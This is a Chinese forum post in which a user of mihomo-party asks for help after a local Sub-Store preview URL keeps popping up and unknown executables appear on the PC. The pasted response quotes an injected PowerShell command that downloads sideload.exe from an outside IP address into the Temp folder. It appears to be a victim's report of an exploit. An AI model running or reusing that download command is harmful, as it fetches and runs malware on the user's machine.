这两天电脑莫名其妙弹出一个url
http://127.0.0.1:38324/api/preview/sub
内容是
{"status":"success","data":{"original":[{"name":"poc","type":"ss","server":"127.0.0.1","port":1080,"cipher":"aes-128-gcm","password":"pass123","id":0,"_subName":"poc"}],"processed":[{"name":"iwr : �ļ���C:\Users\LZJ\AppData\Local\Temp\dl.exe��������һ����ʹ�ã���˸ý��������ʴ��ļ���\r\n����λ�� ��:1 �ַ�: 1\r\n+ iwr '[https://66.179.31.11/sideload.exe](https://66.179.31.11/sideload.exe)' -OutFile 'C:\Users\LZJ\AppDat ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], IOException\r\n + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand\r\n \r\n","type":"ss","server":"127.0.0.1","port":1080,"cipher":"aes-128-gcm","password":"pass123","id":0,"_subName":"poc"}]}}
前两天我都不注意直接关了,今天又弹出来了,仔细看了电脑多了个dl.exe文件,还多了个360speedld.exe和somkernl.dll,正在我电脑上运行。
直接访问127.0.0.1:38324是sub store的端口,我电脑用的是mihomo-party。
现在正在让AI分析这几个文件是什么东西。
有没有佬帮我下。